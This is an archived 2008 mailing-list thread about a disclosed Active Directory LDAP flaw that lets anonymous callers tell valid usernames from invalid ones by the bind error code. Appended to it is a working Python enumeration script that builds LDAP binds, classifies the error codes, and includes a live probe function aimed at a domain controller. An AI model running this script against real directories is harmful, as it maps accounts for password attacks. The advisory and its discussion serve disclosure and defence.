bdesmond (Posts: 730) | 11/18/2008 3:25 PM
If you have it open on your LAN (expected) and someone plugs in that's enough. It comes down to your paranoia level IMO.
Thanks, Brian Desmond brian@briandesmond.com
c - 312.731.3132
From: ActiveDir-owner@mail.activedir.org [mailto:ActiveDir-owner@mail.activedir.org] On Behalf Of Praveen Thampi
Sent: Tuesday, November 18, 2008 2:18 PM
To: ActiveDir@mail.activedir.org
Subject: Re: [ActiveDir] [Fwd: [NT] Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability]
Thanks Brian, Deji.
BTW, why should somebody open LDAP to the public? Also wondering, even if the ports are allowed, they'll be only for specific IPs/subnets, which reduces the surface.

On Wed, Nov 19, 2008 at 1:21 AM, Akomolafe, Deji <deji@readymaids.com> wrote:

It is considered a bug that can be exploited to gather information necessary to mount a better, and more targeted, attack against the infrastructure. You can use this bug to enumerate which accounts are PRESENT in the infrastructure, then you will use that knowledge to use your favorite "hacking" tool to target those known accounts.
This bug itself doesn't appear to give you any direct avenue of attack. I said "doesn't appear" because I am just going by the public information available about the bug. It could be worse, it could be nothing.
Sincerely,
Deji Akomolafe
Microsoft MVP - Directory Services
www.akomolafe.name - we know IT
-5.75, -3.23
Do you now realize that Today is the Tomorrow you were worried about Yesterday? -anon
________________________________
From: ActiveDir-owner@mail.activedir.org [ActiveDir-owner@mail.activedir.org] On Behalf Of Praveen Thampi [mr.praveeng@gmail.com]
Sent: Tuesday, November 18, 2008 11:35 AM
To: ActiveDir@mail.activedir.org
Subject: Re: [ActiveDir] [Fwd: [NT] Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability]
I am a novice, but can somebody explain why this extended error message is a 'vulnerability'?
I mean, if I enter a wrong password for a user a few times in a domain, the account gets locked out and I get the message 'account locked out'. So this means the user existed. Can this too be considered a vulnerability?

On Tue, Nov 18, 2008 at 11:34 PM, Susan Bradley, CPA <sbradcpa@pacbell.net> wrote:
-------- Original Message --------
Subject: [NT] Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability
Date: 18 Nov 2008 19:39:05 +0200
From: SecuriTeam <support@securiteam.com>
To: list@securiteam.com
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability
------------------------------------------------------------------------
SUMMARY
A vulnerability in Microsoft's Windows Active Directory's LDAP server allows remote attackers to discover which usernames are valid and which are not.
DETAILS
Affected systems:
* Microsoft Windows 2000 Server Service Pack 4
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 2
An information disclosure vulnerability exists in the way the Microsoft LDAP server responds to a bind request. When an invalid password is provided, the server responds with result code 49 (invalidCredentials) and an error message. A different error message is returned if an invalid username is provided.
For an existing user the bind response is similar to: 80090308: LdapErr: DSID-0C090334, comment: AcceptSecurityContext error, data 52e, vece
For a non-existent user the following error message is returned: 80090308: LdapErr: DSID-0C090334, comment: AcceptSecurityContext error, data 525, vece
As you can see, the values 52e and 525 differ. The meaning associated with 52e is 'invalid credentials'. The meaning associated with 525 is 'user not found'. The server can respond with seven other error codes, which makes it possible to infer other information about the status of the account, such as "account has expired" or "user account locked".
Impact: A successful exploit of this issue can allow an attacker to anonymously enumerate users on the affected system.
Exploit: An exploit is available at http://labs.portcullis.co.uk/application/ldapuserenum/
Vendor Response and Recommendations:
* Block TCP ports 389 and 636 at the perimeter firewall.
These ports are used to initiate a connection with the affected component.
Blocking them at the enterprise firewall, both inbound and outbound, will help prevent systems that are behind that firewall from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see TCP and UDP Port Assignments (http://go.microsoft.com/fwlink/?LinkId=21312). For more information about the Windows Firewall, see How to Configure Windows Firewall on a Single Computer (http://www.microsoft.com/technet/security/smallbusiness/prodtech/windowsxp/cfgfwall.mspx).
Timeline:
2008/10/06 - Vulnerability discovered
2008/10/21 - Internal proof of concept ready
2008/10/23 - Advisory draft ready
2008/10/24 - Initial notification to the vendor
2008/10/28 - Vendor acknowledges notification, case opened
2008/11/05 - Vendor reproduced the issue and the bug fix will be addressed through a Service Pack release
2008/11/07 - Vendor asks to add a mitigations section to the advisory
2008/11/11 - Portcullis adds a Vendor Response and Recommendations section
2008/11/13 - Advisory published in accordance with the vendor
ADDITIONAL INFORMATION
The information has been provided by Bernardo Damele Assumpcao Guimaraes. The original article can be found at: http://www.portcullis.co.uk/294.php
List info : http://www.activedir.org/List.aspx List FAQ : http://www.activedir.org/ListFAQ.aspx List archive: http://www.activedir.org/ma/default.aspx
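The enumeration the forwarded advisory describes, as an added example that is not the Portcullis tool and not code from anyone in this thread. It hand-encodes an LDAPv3 simple bind, parses the BindResponse, and classifies the `data` value in the AcceptSecurityContext diagnostic. That value is a Win32 error code in hex (0x525 = 1317 ERROR_NO_SUCH_USER, 0x52e = 1326 ERROR_LOGON_FAILURE); the advisory quotes only those two, and the other seven entries in the table are the well-known Active Directory values, assumed here rather than taken from the page. The `corp.example` names and the three server replies are constructed so the script runs offline; `probe_user` shows the live form against a DC and is not exercised.

```python
import re
import socket

# "data NNN" in the AcceptSecurityContext diagnostic is a Win32 error code in hex.
# The advisory quotes only 52e and 525; the other seven are the well-known AD
# values, assumed here rather than taken from the page.
AD_BIND_DATA_CODES = {
    0x525: (False, "user not found"),
    0x52E: (True, "invalid credentials"),
    0x530: (True, "not permitted to log on at this time"),
    0x531: (True, "not permitted to log on at this workstation"),
    0x532: (True, "password expired"),
    0x533: (True, "account disabled"),
    0x701: (True, "account expired"),
    0x773: (True, "user must reset password"),
    0x775: (True, "account locked out"),
}
_DATA_RE = re.compile(r"AcceptSecurityContext error, data ([0-9A-Fa-f]+)")

def classify_bind_error(diagnostic):
    """Map a bind diagnosticMessage to (user_exists, meaning); None if unrecognised."""
    m = _DATA_RE.search(diagnostic)
    if not m:
        return None, "no AcceptSecurityContext data code in message"
    code = int(m.group(1), 16)
    return AD_BIND_DATA_CODES.get(code, (None, "unknown data code 0x%x" % code))

# Minimal BER for LDAPv3 (RFC 4511): just enough for a simple bind and its response.
def _ber_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def _tlv(tag, payload):
    return bytes([tag]) + _ber_len(len(payload)) + payload

def build_simple_bind(msg_id, name, password):
    """LDAPMessage{messageID, BindRequest{version 3, name, simple [0] password}}; msg_id < 128."""
    bind = _tlv(0x02, b"\x03") + _tlv(0x04, name.encode()) + _tlv(0x80, password.encode())
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + _tlv(0x61, bind))

def _read_tlv(buf, pos):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                       # long-form length
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def parse_bind_response(data):
    """Return (resultCode, diagnosticMessage) from an LDAPMessage carrying a BindResponse."""
    tag, body, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, _msg_id, pos = _read_tlv(body, 0)
    tag, resp, _ = _read_tlv(body, pos)
    if tag != 0x61:
        raise ValueError("not a BindResponse")
    _, rc, pos = _read_tlv(resp, 0)          # ENUMERATED resultCode
    _, _matched, pos = _read_tlv(resp, pos)  # matchedDN (empty on AD)
    _, diag, _ = _read_tlv(resp, pos)        # diagnosticMessage
    return int.from_bytes(rc, "big"), diag.decode("utf-8", "replace")

def interpret(rc, diag):
    if rc == 0:
        return True, "bind succeeded"        # password guessed; user obviously exists
    if rc == 49:
        return classify_bind_error(diag)     # invalidCredentials: read the data code
    return None, "bind result %d" % rc

def _fake_bind_response(msg_id, data_code):
    """Constructed sample of a DC's reply (result 49); stands in for a live server."""
    diag = ("80090308: LdapErr: DSID-0C090334, comment: AcceptSecurityContext "
            "error, data %s, vece" % data_code).encode()
    resp = _tlv(0x0A, b"\x31") + _tlv(0x04, b"") + _tlv(0x04, diag)
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + _tlv(0x61, resp))

# Constructed sample replies for three probes against a hypothetical domain.
SAMPLE_RESPONSES = {
    "alice@corp.example": _fake_bind_response(1, "52e"),       # exists, wrong password
    "zzz-nobody@corp.example": _fake_bind_response(2, "525"),  # no such user
    "svc-backup@corp.example": _fake_bind_response(3, "775"),  # exists, locked out
}

def enumerate_users(responses):
    """{bind_name: raw BindResponse bytes} -> {bind_name: (exists, meaning)}."""
    return {name: interpret(*parse_bind_response(raw)) for name, raw in responses.items()}

def probe_user(host, bind_name, port=389, timeout=5):
    """Live probe (not run here): one simple bind with a junk password, single 4 KiB read."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_simple_bind(1, bind_name, "definitely-not-the-password"))
        return interpret(*parse_bind_response(s.recv(4096)))

if __name__ == "__main__":
    for name, (exists, why) in enumerate_users(SAMPLE_RESPONSES).items():
        print("%-26s exists=%-5s %s" % (name, exists, why))
```

This also answers the lockout question raised earlier in the thread: one bind per candidate name is enough to tell 525 from 52e, so the probe never has to reach the lockout threshold, and 775 is only ever observed on an account something else has already locked. Each probe against a real account still increments its bad-password count and leaves a failed-logon audit event on the DC, which is the defender's detection hook when 389/636 cannot simply be firewalled off as the advisory recommends.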